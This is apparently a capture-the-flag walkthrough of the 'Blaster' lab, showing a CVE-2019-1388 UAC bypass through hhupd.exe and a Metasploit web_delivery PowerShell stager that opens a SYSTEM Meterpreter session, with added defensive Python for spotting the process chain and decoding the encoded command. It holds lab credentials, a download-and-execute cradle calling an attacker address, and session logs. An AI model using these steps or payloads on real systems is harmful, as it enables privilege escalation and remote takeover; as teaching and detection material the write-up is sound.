Blaster
HHUPD - CVE-2019-1388
We can log in to the machine over RDP (Remote Desktop Protocol) with the credentials Wade:parzival.
[1]
Upload hhupd.exe to the target machine. (In this case the exploit is already present on the target machine.)[2]
In the Properties of the downloaded executable, tick Unblock.
[3]
Run the executable as Administrator, which brings up the UAC prompt.[4]
Choose: Show information about this publisher's certificate.
[5]
Click the link: VeriSign Commercial Software Publishers CA.
This launches a browser process as NT AUTHORITY\SYSTEM, because the UAC consent dialog that opens the link runs as SYSTEM and the browser inherits that context.[6]
In the browser choose Tools --> File --> Save as...
[7]
Navigate to C:\Windows\System32 and enter *.* in the File name field so that all files (not just HTML) are listed, then locate cmd.exe.[8]
Run cmd.exe as Administrator.[9]
The shell opens as NT AUTHORITY\SYSTEM; confirm with whoami.
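From the defender's side, the bypass above leaves a distinctive process lineage: a browser started by the UAC consent dialog (consent.exe) as SYSTEM, and then a shell started by that browser. The following Python is an added example, not part of the original write-up; it runs the two rules over records constructed to resemble Sysmon Event ID 1 (process create) fields. PIDs, paths and the host/user names are assumptions.

```python
"""Spot the CVE-2019-1388 process chain in process-creation telemetry.

Added example, not from the original write-up. The records below are
constructed to resemble Sysmon Event ID 1 (process create) fields; PIDs,
paths and the host/user names are assumptions.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    parent_image: str
    user: str


SYSTEM = r"NT AUTHORITY\SYSTEM"
# consent.exe is the UAC prompt; the certificate dialog's CA link opens the
# default browser from that SYSTEM process.
UAC_PROMPT = "consent.exe"
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, for case-insensitive image matching."""
    return path.rsplit("\\", 1)[-1].lower()


def find_uac_bypass_chain(events):
    """Return (reason, event) pairs for processes matching the hhupd.exe chain.

    Both rules require the child to run as SYSTEM: a browser spawned by
    consent.exe, or a shell spawned by a browser. A browser under explorer.exe,
    or a shell under a browser running as the interactive user, is not flagged.
    """
    findings = []
    for e in events:
        if e.user != SYSTEM:
            continue
        img, parent = basename(e.image), basename(e.parent_image)
        if parent == UAC_PROMPT and img in BROWSERS:
            findings.append(("browser launched by UAC consent dialog as SYSTEM", e))
        elif parent in BROWSERS and img in SHELLS:
            findings.append(("shell launched by a SYSTEM browser", e))
    return findings


# Constructed sample: the hhupd.exe chain plus benign noise from the logged-on user.
SAMPLE_EVENTS = [
    ProcEvent(900, 600, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe", SYSTEM),
    ProcEvent(4412, 900, r"C:\Windows\System32\consent.exe", r"C:\Windows\System32\svchost.exe", SYSTEM),
    ProcEvent(5120, 4412, r"C:\Program Files\Internet Explorer\iexplore.exe", r"C:\Windows\System32\consent.exe", SYSTEM),
    ProcEvent(5300, 5120, r"C:\Windows\System32\cmd.exe", r"C:\Program Files\Internet Explorer\iexplore.exe", SYSTEM),
    ProcEvent(6100, 2200, r"C:\Program Files\Internet Explorer\iexplore.exe", r"C:\Windows\explorer.exe", r"RETROWEB\Wade"),
    ProcEvent(6200, 6100, r"C:\Windows\System32\cmd.exe", r"C:\Program Files\Internet Explorer\iexplore.exe", r"RETROWEB\Wade"),
]

if __name__ == "__main__":
    for reason, ev in find_uac_bypass_chain(SAMPLE_EVENTS):
        print(f"[!] pid {ev.pid} {basename(ev.image)} <- {basename(ev.parent_image)}: {reason}")
```

The user filter matters: the same browser-then-cmd.exe lineage is normal when it runs as the interactive user (opening a downloaded script, for instance), so only the SYSTEM instances are surfaced.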
Metasploit
- Using: exploit/multi/script/web_delivery
- Target: PSH (PowerShell)
- PAYLOAD: windows/meterpreter/reverse_http
Copy and paste the PSH payload into the Windows terminal that was opened through hhupd.exe.
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started HTTP reverse handler on http://10.10.20.30:4444
[*] Using URL: http://10.10.20.30:8080/fYqJ9hR
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e <base64-encoded stager>
[*] 10.10.155.185 web_delivery - Delivering AMSI Bypass (1381 bytes)
[*] 10.10.155.185 web_delivery - Delivering Payload (3926 bytes)
[!] http://10.10.20.30:4444 handling request from 10.10.155.185; (UUID: 10d0btts) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.20.30:4444 handling request from 10.10.155.185; (UUID: 10d0btts) Staging x86 payload (176732 bytes) ...
[!] http://10.10.20.30:4444 handling request from 10.10.155.185; (UUID: 10d0btts) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.20.30:4444 -> 127.0.0.1) at 2022-10-10 04:44:39 +0200
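The one-liner web_delivery prints is base64 of a UTF-16LE PowerShell script, so anyone who captures the command line can recover the stager and the URL it fetches from. The following Python is an added example, not the write-up's own code: it decodes a `-e`/`-EncodedCommand` argument, pulls the download URLs out of the script and lists the switches (`-nop`, `-w hidden`, `-e`) that such one-liners rely on. SAMPLE_STAGER is a constructed download cradle in the style of the PSH target and points at the URL the listener above advertised; it is not the real generated payload, which also carries proxy handling and the AMSI bypass seen in the log.

```python
"""Decode and triage a web_delivery-style 'powershell.exe -nop -w hidden -e <base64>' command line.

Added example, not the write-up's own code. SAMPLE_STAGER is a constructed
download cradle in the style of web_delivery's PSH target, not the real
generated payload (which also contains proxy and AMSI-bypass logic).
"""
import base64
import re

ENCODED_SWITCHES = {"-e", "-ec", "-enc", "-encodedcommand"}
URL_RE = re.compile(r"""https?://[^\s'"()]+""")


def encode_command(script: str) -> str:
    """What the framework does: base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(cmdline: str):
    """Return the base64 token following -e/-ec/-enc/-EncodedCommand, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_SWITCHES:
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_command; b64decode raises on a truncated or padded-wrong token."""
    return base64.b64decode(b64).decode("utf-16-le")


def suspicious_switches(cmdline: str):
    """Switches the one-liner relies on (PowerShell accepts these abbreviated forms)."""
    tokens = cmdline.lower().split()
    found = []
    for i, tok in enumerate(tokens):
        if tok in ("-nop", "-noprofile"):
            found.append("NoProfile")
        elif tok in ("-w", "-win", "-windowstyle") and i + 1 < len(tokens) and tokens[i + 1] == "hidden":
            found.append("WindowStyle hidden")
        elif tok in ENCODED_SWITCHES:
            found.append("EncodedCommand")
    return found


def analyse(cmdline: str):
    """Return the decoded script, the URLs it contacts and the switches used, or None if not encoded."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return None
    script = decode_encoded_command(b64)
    return {
        "script": script,
        "urls": URL_RE.findall(script),
        "switches": suspicious_switches(cmdline),
    }


# Constructed cradle pointing at the URL the listener advertised in the log above.
SAMPLE_STAGER = "$c=New-Object Net.WebClient;IEX $c.DownloadString('http://10.10.20.30:8080/fYqJ9hR')"
SAMPLE_CMDLINE = f"powershell.exe -nop -w hidden -e {encode_command(SAMPLE_STAGER)}"

if __name__ == "__main__":
    result = analyse(SAMPLE_CMDLINE)
    print("script  :", result["script"])
    print("urls    :", result["urls"])
    print("switches:", result["switches"])
```

The decoded URL is the indicator worth blocking or hunting for: it is the web_delivery server, and every host that fetched the stager will show up in its request log.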
- We have SYSTEM rights: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : RETROWEB
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
Note that this is a 32-bit Meterpreter on a 64-bit host (the log shows "Staging x86 payload"); migrate into a 64-bit process before using post modules that need an x64 session.